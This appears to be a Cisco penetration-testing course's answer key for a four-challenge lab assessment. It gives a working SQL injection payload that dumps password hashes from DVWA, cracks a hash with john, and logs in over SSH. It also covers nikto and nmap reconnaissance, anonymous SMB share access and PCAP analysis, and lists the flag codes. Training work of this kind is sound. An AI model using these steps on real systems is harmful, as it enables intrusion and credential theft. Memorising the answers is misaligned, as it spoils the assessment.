<!DOCTYPE html><html><head>
<style>
      body {
        font-family: Arial, sans-serif;
        margin: 1rem;
      }
      ol,
      ul {
        margin-bottom: 0in;
      }
      table {
        margin-top: 1rem;
        border: 1px solid gray;
        width: 7in;
        border-collapse: collapse;
      }

      table > thead > tr > .openTableTextBox__table-header-data {
        text-align: center;
        margin-top: 6pt;
        margin-right: 0in;
        margin-bottom: 6pt;
        margin-left: 0in;
        text-align: center;
        line-height: 115%;
        page-break-after: avoid;
        font-size: 10pt;
        font-family: "Arial", sans-serif;
        font-weight: bold;
        background: #dbe5f1;
        padding: 0.5rem;
      }
      .openTableTextBox__answerText
        table
        > thead
        > tr
        > .openTableTextBox__table-header-data {
        background: #f2dbdb !important;
      }
      .openTextBox__textArea-container {
        margin-top: 6pt;
        margin-right: 0in;
        margin-bottom: 6pt;
        font-size: 10pt;
        font-family: "Arial", sans-serif;
        width: 50%;
      }
      .openTableTextBox__fieldset {
        padding: 5px;
      }
      td {
        margin-top: 3pt;
        margin-right: 0in;
        margin-bottom: 3pt;
        margin-left: 0in;
        font-size: 10pt;
        font-family: "Arial", sans-serif;
        width: 98.85pt;
        border: solid windowtext 1pt;
        border-top: none;
        padding: 0.7pt 5.75pt 0.7pt 5.75pt;
      }
      textarea {
        width: 100%;
      }
      .answergray {
        padding: 0.2rem;
      }

      .openTableTextBox__widget {
        margin-top: 6pt;
        margin-right: 0in;
        margin-bottom: 6pt;
        margin-left: 0.25in;
      }

      .show-answer,
      .hide-answer {
        padding: 0.5rem 1rem;
        background-color: #3d692b;
        color: #fff;
        border: 0px;
        cursor: pointer;
        margin-bottom: 0.5rem;
        margin-top: 0.5rem;
      }

      .openTextBoxController__button-container {
        display: flex;
        margin-top: 1rem;
        margin-bottom: 1rem;
      }

      .openTextBoxController__button-container .btn-text {
        margin: 10px;
      }

      .btn-text {
        border: 0px;
        padding: 0.5rem 1rem;
        background-color: #3d692b;
        color: #fff;
        border-radius: 0;
        cursor: pointer;
      }

      .u-display-none {
        display: none;
      }
      .openTextBox__postText, openTableTextBox__postText {
        margin-top: 0.5rem;
      }
      .edit-comment {
        display: none;
      }
      .js-heading-inner {
        display: none;
      }
      .block__title-inner,
      .article__title-inner {
        display: block;
        font-size: 1.5em;
        margin-block-start: 0.83em;
        margin-block-end: 0.83em;
        margin-inline-start: 0px;
        margin-inline-end: 0px;
        font-weight: bold;
      }
      h2{
        font-size: 1.25em;
      }
      h3{
        font-size: 1.125em;
      }
      .table
        > .table-inner
        > .table-wrapper
        > .table-widget
        > table
        > tbody
        > tr
        > th {
        border: solid windowtext 1pt;
      }
      .openTableTextBox__answerText
        table
        > thead
        > tr
        > .openTableTextBox__table-header-data {
        background: #f2dbdb !important;
      }
      .command-output > .table-inner > .table-wrapper > .table-widget > table,
      .command-output
        > .table-inner
        > .table-wrapper
        > .table-widget
        > table
        > tbody
        > tr
        > td,
      .command-output
        > .table-inner
        > .table-wrapper
        > .table-widget
        > table
        > tbody
        > tr
        > th {
        border: none !important;
        text-align: right !important;
      }
      .simple-table > .table-inner > .table-wrapper{
        margin-left: 1.5rem;
      }
      .openTextBox__widget {
        margin-left: 1.5rem;
      }
      img {
        width: 30%;
        height: auto;
        margin-top: 1rem;
        margin-left: 3rem;
      }
      .answergray {
        background-color: #ccc;
      }
      .openTableTextBox__widget > .answergray {
        background-color: #fff !important;
      }
      li > ul,ol > li{
        margin-left: 0px !important;
      }
      img {
        width: 30%;
        height: auto;
        margin-top: 1rem;
        margin-left: 3rem;
      }

      .accessibility-completion-indicator{
        display: none;
      }
    </style>

</head><body><!---->
            <div class="article 64cbbb6b62b5167263b4eea3 remove-top-padding remove-padding-bottom remove-padding-top is-complete ">
                <div class="article__inner">
                <div class=" no-adaptive-scroll">
                    <!--?lit$64140180901$-->
                        <div class=""> 
                            <base-view type="article" model="[object Object]" customclass="" lowercase_component="" is-touch="false" fullscreen="true" device="large" browser="Chrome" os="windows" dir="ltr" location="page" theme="dark" orientation="portrait" themetype="article-base-theme"><!---->
      <div class="article__header-wrapper remove-top-padding remove-padding-bottom remove-padding-top ">
        <div class="article__header ">
              <div class="article__header-inner ">
                  
                    <!--?lit$64140180901$-->
                  <!--?lit$64140180901$-->
                  <!--?lit$64140180901$-->
                  <!--?lit$64140180901$-->
                  <!--?lit$64140180901$-->
              </div>
          </div>
        </div>
      
    </base-view>
                            <div class="block__container " style="">
                                <!--?lit$64140180901$--><!---->
                                    <block-view modelid="64cbbb6c62b5167263b4ef37" is-touch="false" fullscreen="true" device="large" browser="Chrome" os="windows" dir="ltr" location="page" theme="dark" orientation="portrait" themetype="article-base-theme" sgpulse-type="block" style="width: 100%;"><!---->
                
                <div data-socialgoodpulse-id="64cbbb6c62b5167263b4ef37" class="64cbbb6c62b5167263b4ef37 block remove-top-padding remove-padding-bottom background-color-white is-complete">
                    <div class="block__inner">    
                    <base-view type="block" modelid="64cbbb6c62b5167263b4ef37" model="[object Object]" customclass="" lowercase_component="" is-touch="false" fullscreen="true" device="large" browser="Chrome" os="windows" dir="ltr" location="page" theme="dark" orientation="portrait" themetype="article-base-theme"><!---->
      <div class="block__header-wrapper remove-top-padding remove-padding-bottom background-color-white ">
        <div class="block__header ">
              <div class="block__header-inner ">
                  
                    <!--?lit$64140180901$-->
                  <!--?lit$64140180901$-->
                  <!--?lit$64140180901$-->
                  <!--?lit$64140180901$-->
                  <!--?lit$64140180901$-->
              </div>
          </div>
        </div>
      
    </base-view>
                        <div class="component__container">                            
                                <!--?lit$64140180901$--><!----><text-view modelid="64cbbb6c62b5167263b4efe8" class="is-full" is-touch="false" fullscreen="true" device="large" browser="Chrome" os="windows" dir="ltr" location="page" theme="dark" orientation="portrait" themetype="article-base-theme" sgpulse-type="component"><!---->
        <div class="component__header-container">
            <div data-socialgoodpulse-id="64cbbb6c62b5167263b4efe8" class="component text 64cbbb6c62b5167263b4efe8  is-full is-complete  ">
                <base-view type="component" lowercase_component="text" model="[object Object]" customclass="" is-touch="false" fullscreen="true" device="large" browser="Chrome" os="windows" dir="ltr" location="page" theme="dark" orientation="portrait" themetype="article-base-theme"><!---->
      <div class="component__header-wrapper  ">
        <div class="component__header text__header">
              <div class="component__header-inner text__header-inner">
                  
                    <!--?lit$64140180901$--> <div class=" component__title text__title">
                      <!--?lit$64140180901$--><heading-view aria-hidden="true" id="64cbbb6c62b5167263b4efe8-heading-view" headingtitle="Skills Assessment - Answer Key" modelid="64cbbb6c62b5167263b4efe8" is-touch="false" fullscreen="true" device="large" browser="Chrome" os="windows" dir="ltr" location="page" theme="dark" orientation="portrait" themetype="article-base-theme"><!---->
      <div class="js-heading is-complete">
        <div class="js-heading-inner" role="heading" id="component-heading" aria-level="4">
        <span class="aria-label"> <!--?lit$64140180901$-->Complete &nbsp;<!--?lit$64140180901$-->Skills Assessment - Answer Key</span>
        </div>
      </div>
    </heading-view>
                        <div tabindex="0" role="heading" class="component__title-inner text__title-inner" aria-level="4">
                        <span class="accessibility-completion-indicator"><!--?lit$64140180901$-->Complete </span>
                        <!--?lit$64140180901$-->Skills Assessment - Answer Key</div>
                      </div>
                  <!--?lit$64140180901$-->
                  <!--?lit$64140180901$--> <div class="component__content">
                      <div tabindex="0" class="component__body text__body">
                        <div class="component__body-inner text__body-inner"><!--?lit$64140180901$--><h2 style="margin-left:0in"><!--[if !supportLists]<span
style='mso-fareast-font-family:Arial;mso-bidi-font-family:Arial'><span
style='mso-list:Ignore'>Challenge 1: </span></span>[endif]-->Challenge 1: SQL Injection</h2><ol start="1" style="list-style-type:lower-alpha"><li><!--[if !supportLists]<span
style='mso-fareast-font-family:Arial;mso-bidi-font-family:Arial'><span
style='mso-list:Ignore'>a.<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span>[endif]-->Open a browser and go to the website at 10.6.6.100.</li></ol><p style="margin-left:40px"><strong>Note:</strong> If you have problems reaching the website, remove the https:// prefix from the IP address in the browser address field.</p><ol start="2" style="list-style-type:lower-alpha"><li><!--[if !supportLists]<span
style='mso-fareast-font-family:Arial;mso-bidi-font-family:Arial'><span
style='mso-list:Ignore'>b.<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span>[endif]-->Login with the credentials <strong><span>admin / password</span></strong><span>.</span></li><li><!--[if !supportLists]<span
style='mso-fareast-font-family:Arial;mso-bidi-font-family:Arial'><span
style='mso-list:Ignore'>c.<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span>[endif]-->Set the DVWA security level to <strong>low</strong> and click <strong>Submit</strong>.</li><li><!--[if !supportLists]<span
style='mso-fareast-font-family:Arial;mso-bidi-font-family:Arial'><span
style='mso-list:Ignore'>d.<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span>[endif]-->Log into the website 10.6.6.100 with username <strong>admin</strong> and password <strong>password</strong>.</li><li><!--[if !supportLists]<span
style='mso-fareast-font-family:Arial;mso-bidi-font-family:Arial'><span
style='mso-list:Ignore'>e.<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span>[endif]-->In the DVWA browser, set DVWA Security to low.</li><li><!--[if !supportLists]-->Go to the SQL Injection page.</li><li>In the User ID field, enter the following:</li></ol><pre style="margin-left:40px"><strong>1' OR 1=1 UNION SELECT user, password FROM users #</strong></pre><ol start="8" style="list-style-type:lower-alpha"><li><!--[if !supportLists]<span
style='mso-fareast-font-family:Arial;mso-bidi-font-family:Arial'><span
style='mso-list:Ignore'>g.<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span>[endif]-->Create a text file with the password hash for Gordon Brown (gordonb) and use john to crack the password.</li></ol><pre style="margin-left:40px">┌──(kali<span>㉿</span>Kali)-[~]</pre><pre style="margin-left:40px">└─$ <strong>echo e99a18c428cb38d5f260853678922e03 &gt; passwd.txt</strong></pre><pre style="margin-left:40px">┌──(kali<span>㉿</span>Kali)-[~]</pre><pre style="margin-left:40px">└─$ <strong>john --format=raw-md5 passwd.txt</strong></pre><ol start="9" style="list-style-type:lower-alpha"><li><!--[if !supportLists]<span
style='mso-fareast-font-family:Arial;mso-bidi-font-family:Arial'><span
style='mso-list:Ignore'>h.<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span>[endif]-->Log into <strong>172.17.0.2</strong> as <strong>Gordon Brown</strong>.</li></ol><pre style="margin-left:40px">┌──(kali<span>㉿</span>Kali)-[~]</pre><pre style="margin-left:40px">└─$ <strong>ssh gordonb@172.17.0.2</strong></pre><ol start="10" style="list-style-type:lower-alpha"><li><!--[if !supportLists]<span
style='mso-fareast-font-family:Arial;mso-bidi-font-family:Arial'><span
style='mso-list:Ignore'>i.<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span>[endif]-->Locate and open the flag file in the user's home directory.</li></ol><pre style="margin-left: 40px;">gordonb@metasploitable:~$ <strong>ls</strong></pre><pre style="margin-left: 40px;"><strong>hkxisx.txt</strong></pre><pre style="margin-left:40px">gordonb@metasploitable:~$ <strong>cat hkxisx.txt</strong></pre><pre style="margin-left:40px">Congratulations!</pre><pre style="margin-left:40px">You found the flag for Challenge 1!</pre><pre style="margin-left:40px">The code for this challenge is 4E9f12.</pre><pre style="margin-left:40px">gordonb@metasploitable:~$</pre><h2 style="margin-left:0in"><!--[if !supportLists]<span
style='mso-fareast-font-family:Arial;mso-bidi-font-family:Arial'><span
style='mso-list:Ignore'>Challenge 2: </span></span>[endif]-->Challenge 2: Web Server Vulnerabilities</h2><ol start="1" style="list-style-type:lower-alpha"><li>If necessary, <span class="AnswerGray"><span>l</span></span>og into the website 10.6.6.100 with username <strong>admin</strong> and password <strong>password</strong>. In the DVWA browser, set DVWA Security to low.</li><li><!--[if !supportLists]<span
style='mso-fareast-font-family:Arial;mso-bidi-font-family:Arial'><span
style='mso-list:Ignore'>a.<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span>[endif]-->Perform reconnaissance on the server to find directories where indexing was found.</li></ol><pre style="margin-left:40px">┌──(kali<span>㉿</span>Kali)-[~]</pre><pre style="margin-left:40px">└─$ <strong>nikto -h 10.6.6.100</strong></pre><ol start="3" style="list-style-type:lower-alpha"><li><!--[if !supportLists]<span
style='mso-fareast-font-family:Arial;mso-bidi-font-family:Arial'><span
style='mso-list:Ignore'>b.<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span>[endif]-->Enter <strong>10.6.6.100/docs</strong> at the browser to locate the <strong>user_form.html</strong> file.</li><li><span>Open the file to view the flag value.</span></li></ol><h2 style="margin-left:0in"><!--[if !supportLists]<span
style='mso-fareast-font-family:Arial;mso-bidi-font-family:Arial'><span
style='mso-list:Ignore'>Challenge 3: </span></span>[endif]-->Challenge 3: Exploit open SMB Server Shares</h2><ol start="1" style="list-style-type:lower-alpha"><li><!--[if !supportLists]<span
style='mso-fareast-font-family:Arial;mso-bidi-font-family:Arial'><span
style='mso-list:Ignore'>a.<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span>[endif]-->Use scanning tools to scan the 10.6.6.0/24 LAN for potential targets for SMB enumeration.</li></ol><pre style="margin-left:40px">┌──(kali<span>㉿</span>Kali)-[~]</pre><pre style="margin-left:40px">└─$ <strong>nmap 10.6.6.0/24</strong></pre><ol start="2" style="list-style-type:lower-alpha"><li><!--[if !supportLists]<span
style='mso-fareast-font-family:Arial;mso-bidi-font-family:Arial'><span
style='mso-list:Ignore'>b.<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span>[endif]-->Use a tool to scan the device that is running SMB and locate the shares that can be accessed by anonymous users.</li></ol><pre style="margin-left:40px">┌──(kali<span>㉿</span>Kali)-[~]</pre><pre style="margin-left:40px">└─$ <strong>enum4linux -S 10.6.6.23</strong></pre><p style="margin-left:40px"><strong>or</strong></p><pre style="margin-left:40px">┌──(kali<span>㉿</span>Kali)-[~]</pre><pre style="margin-left:40px">└─$ <strong>nmap -sV<span>  </span>--script=smb-enum-shares 10.6.6.23</strong></pre><ol start="3" style="list-style-type:lower-alpha"><li><!--[if !supportLists]<span
style='mso-fareast-font-family:Arial;mso-bidi-font-family:Arial'><span
style='mso-list:Ignore'>c.<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span>[endif]-->Use the SMB-native client to access the drive shares on the SMB server. Use the dir, ls, cd, and other commands to find subdirectories and files. Use the password <strong>kali</strong> when prompted.</li></ol><pre style="margin-left:40px">┌──(kali<span>㉿</span>Kali)-[~]</pre><pre style="margin-left:40px">└─$ <strong>smbclient //10.6.6.23/print$</strong></pre><pre style="margin-left:40px">Password for [WORKGROUPkali]:</pre><pre style="margin-left:40px">Anonymous login successful</pre><pre style="margin-left:40px">smb: &gt; <strong>ls</strong></pre><pre style="margin-left:40px">smb: &gt; <strong>cd OTHER</strong></pre><pre style="margin-left:40px">smb: OTHER&gt; <strong>get taxes.txt</strong></pre><pre style="margin-left:40px"><strong>smb:</strong> OTHER&gt; <strong>exit</strong></pre><pre style="margin-left:40px">┌──(kali<span>㉿</span>Kali)-[~]</pre><pre style="margin-left:40px">└─$ <strong>cat taxes.txt</strong></pre><h2 style="margin-left:0in"><!--[if !supportLists]<span
style='mso-fareast-font-family:Arial;mso-bidi-font-family:Arial'><span
style='mso-list:Ignore'>Challenge 4: </span></span>[endif]-->Challenge 4: Analyze a PCAP File to Find Information.</h2><ol start="1" style="list-style-type:lower-alpha"><li><!--[if !supportLists]<span
style='mso-fareast-font-family:Arial;mso-bidi-font-family:Arial'><span
style='mso-list:Ignore'>a.<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span>[endif]-->Analyze the content of the PCAP file to determine the IP address of the target computer and the URL location of the file with the Challenge 4 code.</li></ol><pre style="margin-left:40px">┌──(kali<span>㉿</span>Kali)-[~]</pre><pre style="margin-left:40px">└─$ <strong>wireshark /home/kali/OTHER/SA.pcap</strong></pre><ol start="2" style="list-style-type:lower-alpha"><li><!--[if !supportLists]<span
style='mso-fareast-font-family:Arial;mso-bidi-font-family:Arial'><span
style='mso-list:Ignore'>b.<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;
</span></span></span>[endif]-->Use a web browser to investigate the URLs listed in the Wireshark output. Find the file with the code for Challenge 4 at http://10.6.6.14/data/accounts.xml. The flag value is in the Signature field for the employee ID=”0” record.</li></ol><br><p></p><hr>© 2017 - 2022 Cisco and/or its affiliates. All rights reserved. Cisco Public<p></p></div>
                      </div>
                    </div>
                  <!--?lit$64140180901$-->
                  <!--?lit$64140180901$-->
              </div>
          </div>
        </div>
      
    </base-view>
            </div>
        </div>

        <!-- div><div class="component__inner"></div></div -->
        </text-view><!---->
                            </div>                     
                    </div>
                </div>
            </block-view>
                                <!---->
                            </div>
                        </div>
                        <!--?lit$64140180901$-->
                    </div>
                </div>
            </div>
        <script></script></body>
<script>
    window.addEventListener("load", function () {
      console.log("loaded");
      document.querySelectorAll(".answergray").forEach(function (ele) {
        ele.classList.add("u-display-none");
      });
      document.querySelectorAll(".hide-answer").forEach(function (ele) {
        ele.classList.add("u-display-none");
      });
      document.querySelectorAll(".show-answer").forEach(function (ele) {
        ele.addEventListener("click", function (e) {
          e.currentTarget.nextElementSibling.classList.remove("u-display-none");
          e.currentTarget
            .closest(".question-container")
            .querySelectorAll(".answergray")
            .forEach(function (ele) {
              ele.classList.remove("u-display-none");
            });
          ele.classList.add("u-display-none");
        });
      });
      document.querySelectorAll(".hide-answer").forEach(function (ele) {
        ele.addEventListener("click", function (e) {
          e.currentTarget.previousElementSibling.classList.remove("u-display-none");
          e.currentTarget
            .closest(".question-container")
            .querySelectorAll(".answergray")
            .forEach(function (ele) {
              ele.classList.add("u-display-none");
            });
          ele.classList.add("u-display-none");
        });
      });
      var event = new Event("click", {
        bubbles: true,
        cancelable: true,
      });
      document
        .querySelectorAll(".openTextBoxController__showButton")
        .forEach(function (ele) {
          ele.addEventListener("click", function (e) {
            e.currentTarget.nextElementSibling.classList.remove("u-display-none");
            ele.classList.add("u-display-none");
            document.querySelectorAll(".show-answer").forEach(function (ele) {
              ele.dispatchEvent(event);
            });
          });
        });

      document
        .querySelectorAll(".openTextBoxController__hideButton")
        .forEach(function (ele) {
          ele.addEventListener("click", function (e) {
            e.currentTarget.previousElementSibling.classList.remove("u-display-none");
            ele.classList.add("u-display-none");
            document.querySelectorAll(".hide-answer").forEach(function (ele) {
              ele.dispatchEvent(event);
            });
          });
        });

      document
        .querySelectorAll(".openTextBoxController__resetButton")
        .forEach(function (ele) {
          ele.addEventListener("click", function (e) {
            document.querySelectorAll("textArea").forEach(function (ele) {
              ele.value = "";
            });
          });
        });
    });
  </script>
  </html>